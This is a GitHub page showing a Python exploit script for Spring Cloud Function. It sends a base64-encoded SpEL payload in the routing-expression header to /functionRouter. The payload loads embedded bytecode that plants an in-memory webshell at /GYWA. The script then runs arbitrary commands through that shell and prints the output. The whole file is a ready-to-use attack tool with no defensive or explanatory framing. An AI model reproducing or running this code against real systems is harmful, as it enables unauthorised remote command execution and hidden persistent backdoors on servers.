-
Notifications
You must be signed in to change notification settings - Fork 0
/
spring_cloud_function_memshell.py
39 lines (27 loc) · 7.37 KB
/
spring_cloud_function_memshell.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
import requests
import sys
import base64
springshell="VChvcmcuc3ByaW5nZnJhbWV3b3JrLmNnbGliLmNvcmUuUmVmbGVjdFV0aWxzKS5kZWZpbmVDbGFzcygnU3ByaW5nUmVxdWVzdE1hcHBpbmdNZW1zaGVsbCcsVChvcmcuc3ByaW5nZnJhbWV3b3JrLnV0aWwuQmFzZTY0VXRpbHMpLmRlY29kZUZyb21TdHJpbmcoJ3l2NjZ2Z0FBQURRQWpnb0FCZ0JMQ0FCTUNnQUdBRTBJQURBSEFFNEhBRThIQUZBSEFGRUtBQVVBVWdvQUJ3QlRCd0JVQ0FBeUJ3QlZCd0JXQ2dBT0FFc0lBRmNLQUE0QVdBY0FXUWNBV2dvQUVnQmJDQUJjQ2dBSUFGMEtBQXNBU3dvQUJ3QmVDQUJmQndCZ0NBQmhCd0JpQ2dCakFHUUtBR01BWlFvQVpnQm5DZ0FjQUdnSUFHa0tBQndBYWdvQUhBQnJCd0JzQ1FCdEFHNEtBQ1FBYndFQUJqeHBibWwwUGdFQUF5Z3BWZ0VBQkVOdlpHVUJBQTlNYVc1bFRuVnRZbVZ5VkdGaWJHVUJBQkpNYjJOaGJGWmhjbWxoWW14bFZHRmliR1VCQUFSMGFHbHpBUUFlVEZOd2NtbHVaMUpsY1hWbGMzUk5ZWEJ3YVc1blRXVnRjMmhsYkd3N0FRQUlaRzlKYm1wbFkzUUJBQ1lvVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3S1V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3dFQUZYSmxaMmx6ZEdWeVNHRnVaR3hsY2sxbGRHaHZaQUVBR2t4cVlYWmhMMnhoYm1jdmNtVm1iR1ZqZEM5TlpYUm9iMlE3QVFBT1pYaGxZM1YwWlVOdmJXMWhibVFCQUF0d1lYUm9VR0YwZEdWeWJnRUFNa3h2Y21jdmMzQnlhVzVuWm5KaGJXVjNiM0pyTDNkbFlpOTFkR2xzTDNCaGRIUmxjbTR2VUdGMGFGQmhkSFJsY200N0FRQVljR0YwZEdWeWJuTlNaWEYxWlhOMFEyOXVaR2wwYVc5dUFRQk1URzl5Wnk5emNISnBibWRtY21GdFpYZHZjbXN2ZDJWaUwzSmxZV04wYVhabEwzSmxjM1ZzZEM5amIyNWthWFJwYjI0dlVHRjBkR1Z5Ym5OU1pYRjFaWE4wUTI5dVpHbDBhVzl1T3dFQUVuSmxjWFZsYzNSTllYQndhVzVuU1c1bWJ3RUFRMHh2Y21jdmMzQnlhVzVuWm5KaGJXVjNiM0pyTDNkbFlpOXlaV0ZqZEdsMlpTOXlaWE4xYkhRdmJXVjBhRzlrTDFKbGNYVmxjM1JOWVhCd2FXNW5TVzVtYnpzQkFBRmxBUUFWVEdwaGRtRXZiR0Z1Wnk5RmVHTmxjSFJwYjI0N0FRQWNjbVZ4ZFdWemRFMWhjSEJwYm1kSVlXNWtiR1Z5VFdGd2NHbHVad0VBRWt4cVlYWmhMMnhoYm1jdlQySnFaV04wT3dFQUEyMXpad0VBRWt4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3dFQURWTjBZV05yVFdGd1ZHRmliR1VIQUU4SEFGVUhBR0FCQUJCTlpYUm9iMlJRWVhKaGJXVjBaWEp6QVFBOUtFeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk95bE1iM0puTDNOd2NtbHVaMlp5WVcxbGQyOXlheTlvZEhSd0wxSmxjM0J2Ym5ObFJXNTBhWFI1T3dFQUEyTnRaQUVBQ21WNFpXTlNaWE4xYkhRQkFBcEZlR05sY0hScGIyNXpCd0J3QVFBS1UyOTFjbU5sUm1sc1pRRUFJVk53Y21sdVoxSmxjWFZsYzNSTllYQndhVzVuVFdWdGMyaGxiR3d1YW1GMllRd0FKd0FvQVFBTWFXNXFaV04wTFhOMFlYSjBEQUJ4QUhJQkFBOXFZWFpoTDJ4aGJtY3ZRMnhoYzNNQkFCQnFZWFpoTDJ4aGJtY3ZUMkpxWldOMEFRQVlhbUYyWVM5c1lXNW5MM0psWm14bFkzUXZUV1YwYUc5a0FRQkJiM0puTDNOd2NtbHVaMlp5WVcxbGQyOXlheTkzWldJdmNtVmhZM1JwZG1VdmNtVnpkV3gwTDIxbGRHaHZaQzlTWlhGMVpYTjBUV0Z3Y0dsdVowbHVabThNQUhNQWRBd0FkUUIyQVFBY1UzQnlhVzVuVW1WeGRXVnpkRTFoY0hCcGJtZE5aVzF6YUdWc2JBRUFFR3BoZG1FdmJHRnVaeTlUZEhKcGJtY0JBRFp2Y21jdmMzQnlhVzVuWm5KaGJXVjNiM0pyTDNkbFlpOTFkR2xzTDNCaGRIUmxjbTR2VUdGMGFGQmhkSFJsY201UVlYSnpaWElCQUFVdlIxbFhRUXdBZHdCNEFRQktiM0puTDNOd2NtbHVaMlp5WVcxbGQyOXlheTkzWldJdmNtVmhZM1JwZG1VdmNtVnpkV3gwTDJOdmJtUnBkR2x2Ymk5UVlYUjBaWEp1YzFKbGNYVmxjM1JEYjI1a2FYUnBiMjRCQURCdmNtY3ZjM0J5YVc1blpuSmhiV1YzYjNKckwzZGxZaTkxZEdsc0wzQmhkSFJsY200dlVHRjBhRkJoZEhSbGNtNE1BQ2NBZVFFQUFBd0FKd0I2REFCN0FId0JBQTVwYm1wbFkzUXRjM1ZqWTJWemN3RUFFMnBoZG1FdmJHRnVaeTlGZUdObGNIUnBiMjRCQUF4cGJtcGxZM1F0WlhKeWIzSUJBQkZxWVhaaEwzVjBhV3d2VTJOaGJtNWxjZ2NBZlF3QWZnQi9EQUNBQUlFSEFJSU1BSU1BaEF3QUp3Q0ZBUUFDWEVFTUFJWUFod3dBaUFDSkFRQW5iM0puTDNOd2NtbHVaMlp5WVcxbGQyOXlheTlvZEhSd0wxSmxjM0J2Ym5ObFJXNTBhWFI1QndDS0RBQ0xBSXdNQUNjQWpRRUFFMnBoZG1FdmFXOHZTVTlGZUdObGNIUnBiMjRCQUFoblpYUkRiR0Z6Y3dFQUV5Z3BUR3BoZG1FdmJHRnVaeTlEYkdGemN6c0JBQkZuWlhSRVpXTnNZWEpsWkUxbGRHaHZaQUVBUUNoTWFtRjJZUzlzWVc1bkwxTjBjbWx1Wnp0YlRHcGhkbUV2YkdGdVp5OURiR0Z6Y3pzcFRHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwMWxkR2h2WkRzQkFBMXpaWFJCWTJObGMzTnBZbXhsQVFBRUtGb3BWZ0VBQlhCaGNuTmxBUUJHS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3lsTWIzSm5MM053Y21sdVoyWnlZVzFsZDI5eWF5OTNaV0l2ZFhScGJDOXdZWFIwWlhKdUwxQmhkR2hRWVhSMFpYSnVPd0VBTmloYlRHOXlaeTl6Y0hKcGJtZG1jbUZ0WlhkdmNtc3ZkMlZpTDNWMGFXd3ZjR0YwZEdWeWJpOVFZWFJvVUdGMGRHVnlianNwVmdFQ0pDaE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6dE1iM0puTDNOd2NtbHVaMlp5WVcxbGQyOXlheTkzWldJdmNtVmhZM1JwZG1VdmNtVnpkV3gwTDJOdmJtUnBkR2x2Ymk5UVlYUjBaWEp1YzFKbGNYVmxjM1JEYjI1a2FYUnBiMjQ3VEc5eVp5OXpjSEpwYm1kbWNtRnRaWGR2Y21zdmQyVmlMM0psWVdOMGFYWmxMM0psYzNWc2RDOWpiMjVrYVhScGIyNHZVbVZ4ZFdWemRFMWxkR2h2WkhOU1pYRjFaWE4wUTI5dVpHbDBhVzl1TzB4dmNtY3ZjM0J5YVc1blpuSmhiV1YzYjNKckwzZGxZaTl5WldGamRHbDJaUzl5WlhOMWJIUXZZMjl1WkdsMGFXOXVMMUJoY21GdGMxSmxjWFZsYzNSRGIyNWthWFJwYjI0N1RHOXlaeTl6Y0hKcGJtZG1jbUZ0WlhkdmNtc3ZkMlZpTDNKbFlXTjBhWFpsTDNKbGMzVnNkQzlqYjI1a2FYUnBiMjR2U0dWaFpHVnljMUpsY1hWbGMzUkRiMjVrYVhScGIyNDdURzl5Wnk5emNISnBibWRtY21GdFpYZHZjbXN2ZDJWaUwzSmxZV04wYVhabEwzSmxjM1ZzZEM5amIyNWthWFJwYjI0dlEyOXVjM1Z0WlhOU1pYRjFaWE4wUTI5dVpHbDBhVzl1TzB4dmNtY3ZjM0J5YVc1blpuSmhiV1YzYjNKckwzZGxZaTl5WldGamRHbDJaUzl5WlhOMWJIUXZZMjl1WkdsMGFXOXVMMUJ5YjJSMVkyVnpVbVZ4ZFdWemRFTnZibVJwZEdsdmJqdE1iM0puTDNOd2NtbHVaMlp5WVcxbGQyOXlheTkzWldJdmNtVmhZM1JwZG1VdmNtVnpkV3gwTDJOdmJtUnBkR2x2Ymk5U1pYRjFaWE4wUTI5dVpHbDBhVzl1T3lsV0FRQUdhVzUyYjJ0bEFRQTVLRXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPMXRNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNwVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3QVFBUmFtRjJZUzlzWVc1bkwxSjFiblJwYldVQkFBcG5aWFJTZFc1MGFXMWxBUUFWS0NsTWFtRjJZUzlzWVc1bkwxSjFiblJwYldVN0FRQUVaWGhsWXdFQUp5aE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BUR3BoZG1FdmJHRnVaeTlRY205alpYTnpPd0VBRVdwaGRtRXZiR0Z1Wnk5UWNtOWpaWE56QVFBT1oyVjBTVzV3ZFhSVGRISmxZVzBCQUJjb0tVeHFZWFpoTDJsdkwwbHVjSFYwVTNSeVpXRnRPd0VBR0NoTWFtRjJZUzlwYnk5SmJuQjFkRk4wY21WaGJUc3BWZ0VBREhWelpVUmxiR2x0YVhSbGNnRUFKeWhNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNwVEdwaGRtRXZkWFJwYkM5VFkyRnVibVZ5T3dFQUJHNWxlSFFCQUJRb0tVeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk93RUFJMjl5Wnk5emNISnBibWRtY21GdFpYZHZjbXN2YUhSMGNDOUlkSFJ3VTNSaGRIVnpBUUFDVDBzQkFDVk1iM0puTDNOd2NtbHVaMlp5WVcxbGQyOXlheTlvZEhSd0wwaDBkSEJUZEdGMGRYTTdBUUE2S0V4cVlYWmhMMnhoYm1jdlQySnFaV04wTzB4dmNtY3ZjM0J5YVc1blpuSmhiV1YzYjNKckwyaDBkSEF2U0hSMGNGTjBZWFIxY3pzcFZnQWhBQXNBQmdBQUFBQUFBd0FCQUNjQUtBQUJBQ2tBQUFBdkFBRUFBUUFBQUFVcXR3QUJzUUFBQUFJQUtnQUFBQVlBQVFBQUFBMEFLd0FBQUF3QUFRQUFBQVVBTEFBdEFBQUFDUUF1QUM4QUFnQXBBQUFCVXdBS0FBY0FBQUNTRWdKTUtyWUFBeElFQnIwQUJWa0RFZ1pUV1FRU0IxTlpCUklJVTdZQUNVMHNCTFlBQ2hJTEVnd0V2UUFGV1FNU0RWTzJBQWxPdXdBT1diY0FEeElRdGdBUk9nUzdBQkpaQkwwQUUxa0RHUVJUdHdBVU9nVzdBQWhaRWhVWkJRRUJBUUVCQWJjQUZqb0dMQ29HdlFBR1dRTzdBQXRadHdBWFUxa0VMVk5aQlJrR1U3WUFHRmNTR1V5bkFBZE5FaHRNSzdBQUFRQURBSWtBakFBYUFBTUFLZ0FBQURZQURRQUFBQThBQXdBUkFDQUFFZ0FsQUJNQU5nQVVBRVFBRlFCV0FCWUFhUUFYQUlZQUdBQ0pBQnNBakFBWkFJMEFHZ0NRQUJ3QUt3QUFBRklBQ0FBZ0FHa0FNQUF4QUFJQU5nQlRBRElBTVFBREFFUUFSUUF6QURRQUJBQldBRE1BTlFBMkFBVUFhUUFnQURjQU9BQUdBSTBBQXdBNUFEb0FBZ0FBQUpJQU93QThBQUFBQXdDUEFEMEFQZ0FCQUQ4QUFBQVRBQUwvQUl3QUFnY0FRQWNBUVFBQkJ3QkNBd0JEQUFBQUJRRUFPd0FBQUFFQU1nQkVBQU1BS1FBQUFHZ0FCQUFEQUFBQUpyc0FIRm00QUIwcnRnQWV0Z0FmdHdBZ0VpRzJBQ0syQUNOTnV3QWtXU3l5QUNXM0FDYXdBQUFBQWdBcUFBQUFDZ0FDQUFBQUlBQWFBQ0VBS3dBQUFDQUFBd0FBQUNZQUxBQXRBQUFBQUFBbUFFVUFQZ0FCQUJvQURBQkdBRDRBQWdCSEFBQUFCQUFCQUVnQVF3QUFBQVVCQUVVQUFBQUJBRWtBQUFBQ0FFbz0nKSxuZXcgamF2YXgubWFuYWdlbWVudC5sb2FkaW5nLk1MZXQobmV3IGphdmEubmV0LlVSTFswXSxUKGphdmEubGFuZy5UaHJlYWQpLmN1cnJlbnRUaHJlYWQoKS5nZXRDb250ZXh0Q2xhc3NMb2FkZXIoKSkpLmRvSW5qZWN0KEByZXF1ZXN0TWFwcGluZ0hhbmRsZXJNYXBwaW5nKQ=="
headers={ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15",
"Connection": "close",
"spring.cloud.function.routing-expression": "{}".format(base64.b64decode(springshell).decode()) }
def sendspring(url):
rsp=requests.post(url+"/functionRouter", data="test", headers=headers)
if rsp.status_code!=500:
print("注入失败")
exit(0)
def echospring(url,cmd):
headers={"Connection": "close"}
rsp=requests.get(url+"/GYWA?cmd={}".format(cmd), headers=headers)
print("shell地址:"+url+"/GYWA?cmd={}".format(cmd))
print("无响应命令则注入失败:")
print(rsp.text)
if __name__ == '__main__':
if len(sys.argv)<3:
print("xx.py url cmd")
print("eg:xx.py http://127.0.0.1:8080 whoami")
exit()
url=sys.argv[1]
cmd=sys.argv[2]
sendspring(url)
echospring(url,cmd)